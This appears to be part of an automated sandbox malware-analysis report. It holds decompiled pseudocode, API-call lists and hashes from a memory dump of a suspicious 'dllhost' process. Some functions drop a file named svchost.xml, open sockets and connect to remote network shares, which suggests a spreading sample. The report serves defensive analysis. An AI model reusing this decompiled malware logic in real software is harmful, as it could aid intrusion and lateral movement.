                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,02867878,WIN72K8R2), ref: 028673A8
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,02867878,WIN72K8R2), ref: 028673C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$CreateWrite
                                                • String ID: %s\svchost.xml
                                                • API String ID: 3602564925-772174823
                                                • Opcode ID: d63bb419989771cf0bbfe9925af315d1488411525d224decd5d83032228df973
                                                • Instruction ID: d735c364688b20b72d4bb5033d52d31a5c40495dfefea833e11908b721f5eed6
                                                • Opcode Fuzzy Hash: d63bb419989771cf0bbfe9925af315d1488411525d224decd5d83032228df973
                                                • Instruction Fuzzy Hash: BB210A7DA80218BBDB20DA68DC49FEAB37DDB45704F4400D5FA48E7180DA76A9C48F61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E028790F8(void* __ebx, void* __ecx, void* __edx) {
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t2;
                                                				void* _t3;
                                                				void* _t4;
                                                				intOrPtr _t9;
                                                				void* _t11;
                                                				void* _t20;
                                                				void* _t21;
                                                				void* _t23;
                                                				void* _t25;
                                                				void* _t27;
                                                				void* _t29;
                                                				void* _t31;
                                                				void* _t32;
                                                				long _t36;
                                                				long _t37;
                                                				void* _t40;
                                                
                                                				_t29 = __edx;
                                                				_t23 = __ecx;
                                                				_t20 = __ebx;
                                                				_t36 = GetLastError();
                                                				_t2 =  *0x2890558; // 0x6
                                                				_t42 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L2:
                                                					_t3 = E028778D0(_t23, 1, 0x364);
                                                					_t31 = _t3;
                                                					_pop(_t25);
                                                					if(_t31 != 0) {
                                                						_t4 = E02877F1D(_t25, __eflags,  *0x2890558, _t31);
                                                						__eflags = _t4;
                                                						if(_t4 != 0) {
                                                							E02878F6A(_t25, _t31, 0x2896690);
                                                							E02877848(0);
                                                							_t40 = _t40 + 0xc;
                                                							__eflags = _t31;
                                                							if(_t31 == 0) {
                                                								goto L9;
                                                							} else {
                                                								goto L8;
                                                							}
                                                						} else {
                                                							_push(_t31);
                                                							goto L4;
                                                						}
                                                					} else {
                                                						_push(_t3);
                                                						L4:
                                                						E02877848();
                                                						_pop(_t25);
                                                						L9:
                                                						SetLastError(_t36);
                                                						E02877805(_t20, _t29, _t31, _t36);
                                                						asm("int3");
                                                						_push(_t20);
                                                						_push(_t36);
                                                						_push(_t31);
                                                						_t37 = GetLastError();
                                                						_t21 = 0;
                                                						_t9 =  *0x2890558; // 0x6
                                                						_t45 = _t9 - 0xffffffff;
                                                						if(_t9 == 0xffffffff) {
                                                							L12:
                                                							_t32 = E028778D0(_t25, 1, 0x364);
                                                							_pop(_t27);
                                                							if(_t32 != 0) {
                                                								_t11 = E02877F1D(_t27, __eflags,  *0x2890558, _t32);
                                                								__eflags = _t11;
                                                								if(_t11 != 0) {
                                                									E02878F6A(_t27, _t32, 0x2896690);
                                                									E02877848(_t21);
                                                									__eflags = _t32;
                                                									if(_t32 != 0) {
                                                										goto L19;
                                                									} else {
                                                										goto L18;
                                                									}
                                                								} else {
                                                									_push(_t32);
                                                									goto L14;
                                                								}
                                                							} else {
                                                								_push(_t21);
                                                								L14:
                                                								E02877848();
                                                								L18:
                                                								SetLastError(_t37);
                                                							}
                                                						} else {
                                                							_t32 = E02877EC7(_t25, _t45, _t9);
                                                							if(_t32 != 0) {
                                                								L19:
                                                								SetLastError(_t37);
                                                								_t21 = _t32;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						}
                                                						return _t21;
                                                					}
                                                				} else {
                                                					_t31 = E02877EC7(_t23, _t42, _t2);
                                                					if(_t31 != 0) {
                                                						L8:
                                                						SetLastError(_t36);
                                                						return _t31;
                                                					} else {
                                                						goto L2;
                                                					}
                                                				}
                                                 			}

                                                APIs
                                                • GetLastError.KERNEL32(123,?,028749AE,?,123,?,02877670,02890E80,123,?,73B76490,123,?,77109EB0), ref: 028790FC
                                                • SetLastError.KERNEL32(00000000,123,?,73B76490,123,?,77109EB0), ref: 02879164
                                                • SetLastError.KERNEL32(00000000,123,?,73B76490,123,?,77109EB0), ref: 02879170
                                                • _abort.LIBCMT ref: 02879176
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_abort
                                                • String ID: 123
                                                • API String ID: 88804580-2286445522
                                                • Opcode ID: 375874030db38cc7d77fbccecf7c092987e80d1fa64a43fa55e97a2feebfed10
                                                • Instruction ID: c14173ee99e49433724908467890af25b8c3e8b334ff21e383a63958a51bd6e1
                                                • Opcode Fuzzy Hash: 375874030db38cc7d77fbccecf7c092987e80d1fa64a43fa55e97a2feebfed10
                                                • Instruction Fuzzy Hash: D1F0683EA8460066D612363CAC0DF2B666A9BC3775F160524F51DE62C0EF7CC821C976
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: connectgethostbynamehtonssocket
                                                • String ID:
                                                • API String ID: 3705698054-0
                                                • Opcode ID: e4d3b5bee106f6a5a1d291a695544c121e98e687d3417ddaeb83c3816382f277
                                                • Instruction ID: 4f3e3864d98d27072ca37dd15afaa8e28a707e84f0ace4d517a3f82341b27acd
                                                • Opcode Fuzzy Hash: e4d3b5bee106f6a5a1d291a695544c121e98e687d3417ddaeb83c3816382f277
                                                • Instruction Fuzzy Hash: D721AF3DA40209AFC711EFA8D809BAEB7B5FF55710F01015AE905EB290EB749A148BD6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E0286B0F0(intOrPtr* __ecx, char* __edx, void* __edi, char* _a4) {
                                                				signed int _v8;
                                                				char _v276;
                                                				char _v540;
                                                				char* _v560;
                                                				int _v576;
                                                				struct _NETRESOURCE _v580;
                                                				char* _v584;
                                                				char* _v588;
                                                				void* __esi;
                                                				signed int _t23;
                                                				intOrPtr* _t26;
                                                				char _t42;
                                                				intOrPtr* _t51;
                                                				void* _t56;
                                                				long _t57;
                                                				void* _t58;
                                                				void* _t59;
                                                				signed int _t60;
                                                				signed int _t62;
                                                				signed int _t63;
                                                
                                                				_t62 = (_t60 & 0xfffffff0) - 0x248;
                                                				_t23 =  *0x288f008; // 0xe7fe870c
                                                				_v8 = _t23 ^ _t62;
                                                				_t51 = __ecx;
                                                				_v584 = _a4;
                                                				_v588 = __edx;
                                                				_t26 = __ecx;
                                                				_t56 =  &_v540 - __ecx;
                                                				do {
                                                					_t42 =  *_t26;
                                                					_t26 = _t26 + 1;
                                                					 *((char*)(_t56 + _t26 - 1)) = _t42;
                                                				} while (_t42 != 0);
                                                				E0286A2B0( &_v540);
                                                				E02863F90( &_v540,  &_v276, "\\\\%s",  &_v540);
                                                				_t63 = _t62 + 0xc;
                                                				asm("xorps xmm0, xmm0");
                                                				asm("movaps [esp+0x20], xmm0");
                                                				_v560 =  &_v276;
                                                				asm("movaps [esp+0x18], xmm0");
                                                				_v576 = 0;
                                                				_t57 = WNetAddConnection2A( &_v580, _v584, _v588, 0);
                                                				if(_t57 != 0) {
                                                					if(_t57 != 0x4c3) {
                                                						L6:
                                                						SetLastError(_t57);
                                                						_pop(_t58);
                                                						return E02870A5D(_v8 ^ _t63, _t58);
                                                					} else {
                                                						E0286B1F0(_t51, _t57);
                                                						_t57 = WNetAddConnection2A( &_v580, _v584, _v588, 0);
                                                						if(_t57 == 0) {
                                                							goto L3;
                                                						} else {
                                                							goto L6;
                                                						}
                                                					}
                                                				} else {
                                                					L3:
                                                					_pop(_t59);
                                                					return E02870A5D(_v8 ^ _t63, _t59);
                                                				}
                                                 			}

                                                APIs
                                                • WNetAddConnection2A.MPR(?), ref: 0286B180
                                                • SetLastError.KERNEL32(00000000), ref: 0286B1CD
                                                  • Part of subcall function 0286B1F0: WNetCancelConnection2A.MPR(?,00000000,00000001), ref: 0286B24E
                                                • WNetAddConnection2A.MPR(?,?,?,00000000), ref: 0286B1C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Connection2$CancelErrorLast
                                                • String ID: \\%s
                                                • API String ID: 4062109977-3838199987
                                                • Opcode ID: 196d49843436d4dffd38dcf66c1b377157a621b85aa675f13cf15971baecb049
                                                • Instruction ID: 4885137213887c8ea504dc492306b7c3b4085ae6beeef2fd9be2056835f0ca80
                                                • Opcode Fuzzy Hash: 196d49843436d4dffd38dcf66c1b377157a621b85aa675f13cf15971baecb049
                                                • Instruction Fuzzy Hash: BD21B939908345ABC721DF68D809B9BB7E9EFC4314F400919F98DD7250EB3595148B82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E0287932B(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				unsigned int _v20;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				char _v40;
                                                				intOrPtr _v48;
                                                				char _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* _t86;
                                                				signed int _t92;
                                                				signed int _t93;
                                                				signed int _t94;
                                                				signed int _t100;
                                                				void* _t101;
                                                				void* _t102;
                                                				void* _t104;
                                                				void* _t107;
                                                				void* _t109;
                                                				void* _t111;
                                                				void* _t115;
                                                				char* _t116;
                                                				void* _t119;
                                                				signed int _t121;
                                                				signed int _t128;
                                                				signed int* _t129;
                                                				signed int _t136;
                                                				signed int _t137;
                                                				char _t138;
                                                				signed int _t139;
                                                				signed int _t142;
                                                				signed int _t146;
                                                				signed int _t151;
                                                				char _t156;
                                                				char _t157;
                                                				void* _t161;
                                                				unsigned int _t162;
                                                				signed int _t164;
                                                				signed int _t166;
                                                				signed int _t170;
                                                				void* _t171;
                                                				signed int* _t172;
                                                				signed int _t174;
                                                				signed int _t181;
                                                				signed int _t182;
                                                				signed int _t183;
                                                				signed int _t184;
                                                				signed int _t185;
                                                				signed int _t186;
                                                				signed int _t187;
                                                
                                                				_t171 = __edx;
                                                				_t181 = _a24;
                                                				if(_t181 < 0) {
                                                					_t181 = 0;
                                                				}
                                                				_t184 = _a8;
                                                				 *_t184 = 0;
                                                				E02874970(0,  &_v52, _t171, _a36);
                                                				_t5 = _t181 + 0xb; // 0xb
                                                				if(_a12 > _t5) {
                                                					_t172 = _a4;
                                                					_t142 = _t172[1];
                                                					_v36 =  *_t172;
                                                					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                						L11:
                                                						__eflags = _t142 & 0x80000000;
                                                						if((_t142 & 0x80000000) != 0) {
                                                							 *_t184 = 0x2d;
                                                							_t184 = _t184 + 1;
                                                							__eflags = _t184;
                                                						}
                                                						__eflags = _a28;
                                                						_v16 = 0x3ff;
                                                						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                						__eflags = _t172[1] & 0x7ff00000;
                                                						_v32 = _t136;
                                                						_t86 = 0x30;
                                                						if((_t172[1] & 0x7ff00000) != 0) {
                                                							 *_t184 = 0x31;
                                                							_t185 = _t184 + 1;
                                                							__eflags = _t185;
                                                						} else {
                                                							 *_t184 = _t86;
                                                							_t185 = _t184 + 1;
                                                							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                							__eflags = _t164;
                                                							if(_t164 != 0) {
                                                								_v16 = 0x3fe;
                                                							} else {
                                                								_v16 = _v16 & _t164;
                                                							}
                                                						}
                                                						_t146 = _t185;
                                                						_t186 = _t185 + 1;
                                                						_v28 = _t146;
                                                						__eflags = _t181;
                                                						if(_t181 != 0) {
                                                							_t30 = _v48 + 0x88; // 0xffce8305
                                                							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                                                						} else {
                                                							 *_t146 = 0;
                                                						}
                                                						_t92 = _t172[1] & 0x000fffff;
                                                						__eflags = _t92;
                                                						_v20 = _t92;
                                                						if(_t92 > 0) {
                                                							L23:
                                                							_t33 =  &_v8;
                                                							 *_t33 = _v8 & 0x00000000;
                                                							__eflags =  *_t33;
                                                							_t147 = 0xf0000;
                                                							_t93 = 0x30;
                                                							_v12 = _t93;
                                                							_v20 = 0xf0000;
                                                							do {
                                                								__eflags = _t181;
                                                								if(_t181 <= 0) {
                                                									break;
                                                								}
                                                								_t119 = E02883C50( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                								_t161 = 0x30;
                                                								_t121 = _t119 + _t161 & 0x0000ffff;
                                                								__eflags = _t121 - 0x39;
                                                								if(_t121 > 0x39) {
                                                									_t121 = _t121 + _t136;
                                                									__eflags = _t121;
                                                								}
                                                								_t162 = _v20;
                                                								_t172 = _a4;
                                                								 *_t186 = _t121;
                                                								_t186 = _t186 + 1;
                                                								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                								_t147 = _t162 >> 4;
                                                								_t93 = _v12 - 4;
                                                								_t181 = _t181 - 1;
                                                								_v20 = _t162 >> 4;
                                                								_v12 = _t93;
                                                								__eflags = _t93;
                                                							} while (_t93 >= 0);
                                                							__eflags = _t93;
                                                							if(_t93 < 0) {
                                                								goto L39;
                                                							}
                                                							_t115 = E02883C50( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                							__eflags = _t115 - 8;
                                                							if(_t115 <= 8) {
                                                								goto L39;
                                                							}
                                                							_t116 = _t186 - 1;
                                                							_t138 = 0x30;
                                                							while(1) {
                                                								_t156 =  *_t116;
                                                								__eflags = _t156 - 0x66;
                                                								if(_t156 == 0x66) {
                                                									goto L33;
                                                								}
                                                								__eflags = _t156 - 0x46;
                                                								if(_t156 != 0x46) {
                                                									_t139 = _v32;
                                                									__eflags = _t116 - _v28;
                                                									if(_t116 == _v28) {
                                                										_t57 = _t116 - 1;
                                                										 *_t57 =  *(_t116 - 1) + 1;
                                                										__eflags =  *_t57;
                                                									} else {
                                                										_t157 =  *_t116;
                                                										__eflags = _t157 - 0x39;
                                                										if(_t157 != 0x39) {
                                                											 *_t116 = _t157 + 1;
                                                										} else {
                                                											 *_t116 = _t139 + 0x3a;
                                                										}
                                                									}
                                                									goto L39;
                                                								}
                                                								L33:
                                                								 *_t116 = _t138;
                                                								_t116 = _t116 - 1;
                                                							}
                                                						} else {
                                                							__eflags =  *_t172;
                                                							if( *_t172 <= 0) {
                                                								L39:
                                                								__eflags = _t181;
                                                								if(_t181 > 0) {
                                                									_push(_t181);
                                                									_t111 = 0x30;
                                                									_push(_t111);
                                                									_push(_t186);
                                                									E02873440(_t181);
                                                									_t186 = _t186 + _t181;
                                                									__eflags = _t186;
                                                								}
                                                								_t94 = _v28;
                                                								__eflags =  *_t94;
                                                								if( *_t94 == 0) {
                                                									_t186 = _t94;
                                                								}
                                                								__eflags = _a28;
                                                								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                								_t174 = _a4[1];
                                                								_t100 = E02883C50( *_a4, 0x34, _t174);
                                                								_t137 = 0;
                                                								_t151 = (_t100 & 0x000007ff) - _v16;
                                                								__eflags = _t151;
                                                								asm("sbb ebx, ebx");
                                                								if(__eflags < 0) {
                                                									L47:
                                                									 *(_t186 + 1) = 0x2d;
                                                									_t187 = _t186 + 2;
                                                									__eflags = _t187;
                                                									_t151 =  ~_t151;
                                                									asm("adc ebx, 0x0");
                                                									_t137 =  ~_t137;
                                                									goto L48;
                                                								} else {
                                                									if(__eflags > 0) {
                                                										L46:
                                                										 *(_t186 + 1) = 0x2b;
                                                										_t187 = _t186 + 2;
                                                										L48:
                                                										_t182 = _t187;
                                                										_t101 = 0x30;
                                                										 *_t187 = _t101;
                                                										__eflags = _t137;
                                                										if(__eflags < 0) {
                                                											L56:
                                                											__eflags = _t187 - _t182;
                                                											if(_t187 != _t182) {
                                                												L60:
                                                												_push(0);
                                                												_push(0xa);
                                                												_push(_t137);
                                                												_push(_t151);
                                                												_t102 = E02883B70();
                                                												_v32 = _t174;
                                                												 *_t187 = _t102 + 0x30;
                                                												_t187 = _t187 + 1;
                                                												__eflags = _t187;
                                                												L61:
                                                												_t104 = 0x30;
                                                												_t183 = 0;
                                                												__eflags = 0;
                                                												 *_t187 = _t151 + _t104;
                                                												 *(_t187 + 1) = 0;
                                                												goto L62;
                                                											}
                                                											__eflags = _t137;
                                                											if(__eflags < 0) {
                                                												goto L61;
                                                											}
                                                											if(__eflags > 0) {
                                                												goto L60;
                                                											}
                                                											__eflags = _t151 - 0xa;
                                                											if(_t151 < 0xa) {
                                                												goto L61;
                                                											}
                                                											goto L60;
                                                										}
                                                										if(__eflags > 0) {
                                                											L51:
                                                											_push(0);
                                                											_push(0x3e8);
                                                											_push(_t137);
                                                											_push(_t151);
                                                											_t107 = E02883B70();
                                                											_v32 = _t174;
                                                											 *_t187 = _t107 + 0x30;
                                                											_t187 = _t187 + 1;
                                                											__eflags = _t187 - _t182;
                                                											if(_t187 != _t182) {
                                                												L55:
                                                												_push(0);
                                                												_push(0x64);
                                                												_push(_t137);
                                                												_push(_t151);
                                                												_t109 = E02883B70();
                                                												_v32 = _t174;
                                                												 *_t187 = _t109 + 0x30;
                                                												_t187 = _t187 + 1;
                                                												__eflags = _t187;
                                                												goto L56;
                                                											}
                                                											L52:
                                                											__eflags = _t137;
                                                											if(__eflags < 0) {
                                                												goto L56;
                                                											}
                                                											if(__eflags > 0) {
                                                												goto L55;
                                                											}
                                                											__eflags = _t151 - 0x64;
                                                											if(_t151 < 0x64) {
                                                												goto L56;
                                                											}
                                                											goto L55;
                                                										}
                                                										__eflags = _t151 - 0x3e8;
                                                										if(_t151 < 0x3e8) {
                                                											goto L52;
                                                										}
                                                										goto L51;
                                                									}
                                                									__eflags = _t151;
                                                									if(_t151 < 0) {
                                                										goto L47;
                                                									}
                                                									goto L46;
                                                								}
                                                							}
                                                							goto L23;
                                                						}
                                                					}
                                                					__eflags = 0;
                                                					if(0 != 0) {
                                                						goto L11;
                                                					} else {
                                                						_t183 = E0287962E(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                						__eflags = _t183;
                                                						if(_t183 == 0) {
                                                							_t128 = E02884330(_t184, 0x65);
                                                							_pop(_t166);
                                                							__eflags = _t128;
                                                							if(_t128 != 0) {
                                                								__eflags = _a28;
                                                								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                								__eflags = _t170;
                                                								 *_t128 = _t170;
                                                								 *((char*)(_t128 + 3)) = 0;
                                                							}
                                                							_t183 = 0;
                                                						} else {
                                                							 *_t184 = 0;
                                                						}
                                                						goto L62;
                                                					}
                                                				} else {
                                                					_t129 = E02875D43();
                                                					_t183 = 0x22;
                                                					 *_t129 = _t183;
                                                					E02875C10();
                                                					L62:
                                                					if(_v40 != 0) {
                                                						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                					}
                                                					return _t183;
                                                				}
                                                			}
























































                                                0x028795f9
                                                0x028795fa
                                                0x028795fb
                                                0x02879602
                                                0x02879605
                                                0x02879607
                                                0x02879607
                                                0x02879608
                                                0x0287960a
                                                0x0287960d
                                                0x0287960d
                                                0x0287960f
                                                0x02879611
                                                0x00000000
                                                0x02879611
                                                0x028795ea
                                                0x028795ec
                                                0x00000000
                                                0x00000000
                                                0x028795ee
                                                0x00000000
                                                0x00000000
                                                0x028795f0
                                                0x028795f3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028795f3
                                                0x028795ac
                                                0x028795b2
                                                0x028795b2
                                                0x028795b4
                                                0x028795b5
                                                0x028795b6
                                                0x028795b7
                                                0x028795be
                                                0x028795c1
                                                0x028795c3
                                                0x028795c4
                                                0x028795c6
                                                0x028795d3
                                                0x028795d3
                                                0x028795d5
                                                0x028795d7
                                                0x028795d8
                                                0x028795d9
                                                0x028795e0
                                                0x028795e3
                                                0x028795e5
                                                0x028795e5
                                                0x00000000
                                                0x028795e5
                                                0x028795c8
                                                0x028795c8
                                                0x028795ca
                                                0x00000000
                                                0x00000000
                                                0x028795cc
                                                0x00000000
                                                0x00000000
                                                0x028795ce
                                                0x028795d1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028795d1
                                                0x028795ae
                                                0x028795b0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028795b0
                                                0x02879581
                                                0x02879583
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02879583
                                                0x0287957d
                                                0x00000000
                                                0x02879467
                                                0x02879462
                                                0x02879389
                                                0x0287938b
                                                0x00000000
                                                0x0287938d
                                                0x028793a3
                                                0x028793a8
                                                0x028793aa
                                                0x028793b6
                                                0x028793bc
                                                0x028793bd
                                                0x028793bf
                                                0x028793c1
                                                0x028793cc
                                                0x028793cc
                                                0x028793cf
                                                0x028793d1
                                                0x028793d1
                                                0x028793d4
                                                0x028793ac
                                                0x028793ac
                                                0x028793ac
                                                0x00000000
                                                0x028793aa
                                                0x02879359
                                                0x02879359
                                                0x02879360
                                                0x02879361
                                                0x02879363
                                                0x02879615
                                                0x02879619
                                                0x0287961e
                                                0x0287961e
                                                0x0287962d
                                                0x0287962d

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 77f5d455d6bbc46f51ca056e9603e57878b5f4042b499e8e25835957a280ac19
                                                • Instruction ID: 7fdf83ebb01317ce73289f4504332ea1704372f8b4737d6c9c515daaa1937c70
                                                • Opcode Fuzzy Hash: 77f5d455d6bbc46f51ca056e9603e57878b5f4042b499e8e25835957a280ac19
                                                • Instruction Fuzzy Hash: 65A1657EA047969FEB21CF28C8907AEBBE5EF15314F1842ADD499DB281D338C941CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E02869B40(void* __ecx, intOrPtr __edx) {
                                                				signed int _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t47;
                                                				intOrPtr _t48;
                                                				char _t50;
                                                				intOrPtr _t54;
                                                				void* _t55;
                                                				intOrPtr _t57;
                                                				char _t59;
                                                				intOrPtr _t63;
                                                				void* _t64;
                                                				void* _t66;
                                                				intOrPtr _t67;
                                                				intOrPtr* _t69;
                                                				void* _t73;
                                                				intOrPtr* _t76;
                                                				void* _t80;
                                                				void* _t84;
                                                				void* _t85;
                                                				intOrPtr* _t86;
                                                				intOrPtr* _t87;
                                                				signed int _t88;
                                                				intOrPtr _t89;
                                                				signed int _t90;
                                                				intOrPtr _t91;
                                                				void* _t92;
                                                
                                                				_t47 = 0;
                                                				_v12 = __edx;
                                                				_t66 = __ecx;
                                                				_v8 = 0;
                                                				asm("o16 nop [eax+eax]");
                                                				while(1) {
                                                					_t3 = _t47 + 0x2894e80; // 0x2894e80
                                                					_t86 = _t3;
                                                					if(_t86 == 0) {
                                                						break;
                                                					} else {
                                                						_t76 = _t86;
                                                						_t4 = _t76 + 1; // 0x2894e81
                                                						_t85 = _t4;
                                                						goto L3;
                                                					}
                                                					do {
                                                						L3:
                                                						_t57 =  *_t76;
                                                						_t76 = _t76 + 1;
                                                					} while (_t57 != 0);
                                                					if(_t76 == _t85) {
                                                						break;
                                                					}
                                                					_t90 = 0;
                                                					if( *(_t66 + 0x20) <= 0) {
                                                						L10:
                                                						_t91 = E02870A6E(_t90, _t99, 0x100);
                                                						_t92 = _t92 + 4;
                                                						_v16 = _t91;
                                                						_t80 = _t91 - _v8 - 0x2894e80;
                                                						do {
                                                							_t59 =  *_t86;
                                                							_t86 = _t86 + 1;
                                                							 *((char*)(_t80 + _t86 - 1)) = _t59;
                                                						} while (_t59 != 0);
                                                						if(E02866F70(_t66) != 0) {
                                                							_t16 = _t66 + 0x20; // 0x4d005c
                                                							_t17 = _t66 + 0x1c; // 0x610074
                                                							 *((intOrPtr*)( *_t17 +  *_t16 * 4)) = _t91;
                                                							 *(_t66 + 0x20) =  *(_t66 + 0x20) + 1;
                                                						}
                                                						L14:
                                                						_t47 = _v8 - 0xffffff80;
                                                						_v8 = _t47;
                                                						if(_t47 < 0x600) {
                                                							continue;
                                                						}
                                                						break;
                                                					} else {
                                                						goto L6;
                                                					}
                                                					while(1) {
                                                						L6:
                                                						_t63 = 0;
                                                						_t6 = _t66 + 0x20; // 0x4d005c
                                                						if(_t90 <  *_t6) {
                                                							_t7 = _t66 + 0x1c; // 0x610074
                                                							_t63 =  *((intOrPtr*)( *_t7 + _t90 * 4));
                                                						}
                                                						_t64 = E02877612(_t86, _t90, _t63, _t86);
                                                						_t92 = _t92 + 8;
                                                						if(_t64 == 0) {
                                                							goto L14;
                                                						}
                                                						_t90 = _t90 + 1;
                                                						_t10 = _t66 + 0x20; // 0x4d005c
                                                						_t99 = _t90 -  *_t10;
                                                						if(_t90 <  *_t10) {
                                                							continue;
                                                						}
                                                						goto L10;
                                                					}
                                                					goto L14;
                                                				}
                                                				_t67 = _v12;
                                                				_t48 = 0;
                                                				_v8 = 0;
                                                				asm("o16 nop [eax+eax]");
                                                				while(1) {
                                                					_t26 = _t48 + "123"; // 0x2890e80
                                                					_t87 = _t26;
                                                					if(_t87 == 0) {
                                                						break;
                                                					}
                                                					_t69 = _t87;
                                                					_t27 = _t69 + 1; // 0x2890e81
                                                					_t84 = _t27;
                                                					do {
                                                						_t48 =  *_t69;
                                                						_t69 = _t69 + 1;
                                                					} while (_t48 != 0);
                                                					if(_t69 == _t84) {
                                                						break;
                                                					}
                                                					_t88 = 0;
                                                					if( *(_t67 + 0x20) <= 0) {
                                                						L25:
                                                						_t89 = E02870A6E(_t88, _t111, 0x100);
                                                						_t92 = _t92 + 4;
                                                						_v16 = _t89;
                                                						_t73 = _t89 - _v8 - "123";
                                                						do {
                                                							_t50 =  *_t87;
                                                							_t36 = _t87 + 1; // 0x3332
                                                							_t87 = _t36;
                                                							 *((char*)(_t73 + _t87 - 1)) = _t50;
                                                						} while (_t50 != 0);
                                                						if(E02866F70(_t67) != 0) {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x1c)) +  *(_t67 + 0x20) * 4)) = _t89;
                                                							 *(_t67 + 0x20) =  *(_t67 + 0x20) + 1;
                                                						}
                                                						L29:
                                                						_t48 = _v8 - 0xffffff80;
                                                						_v8 = _t48;
                                                						if(_t48 < 0x4000) {
                                                							continue;
                                                						}
                                                						break;
                                                					} else {
                                                						goto L21;
                                                					}
                                                					while(1) {
                                                						L21:
                                                						_t54 = 0;
                                                						if(_t88 <  *(_t67 + 0x20)) {
                                                							_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x1c)) + _t88 * 4));
                                                						}
                                                						_t55 = E02877612(_t87, _t88, _t54, _t87);
                                                						_t92 = _t92 + 8;
                                                						if(_t55 == 0) {
                                                							goto L29;
                                                						}
                                                						_t88 = _t88 + 1;
                                                						_t111 = _t88 -  *(_t67 + 0x20);
                                                						if(_t88 <  *(_t67 + 0x20)) {
                                                							continue;
                                                						}
                                                						goto L25;
                                                					}
                                                					goto L29;
                                                				}
                                                				return _t48;
                                                			}

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 123
                                                • API String ID: 0-2286445522
                                                • Opcode ID: e8d29a36c4079fa1f2a50318564dd048474e7862c7ce3f24c212a982e364fd06
                                                • Instruction ID: db493ccd953f93e55c3bf1bb07751a7f20936b5aed864053f236001930c4aa71
                                                • Opcode Fuzzy Hash: e8d29a36c4079fa1f2a50318564dd048474e7862c7ce3f24c212a982e364fd06
                                                • Instruction Fuzzy Hash: DA41B57D900215DFCF14DF689488AB9B7B6BF49304B164698CC89EF386D731E902CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E0286A330(WCHAR* __ecx) {
                                                				struct _PROCESS_INFORMATION _v24;
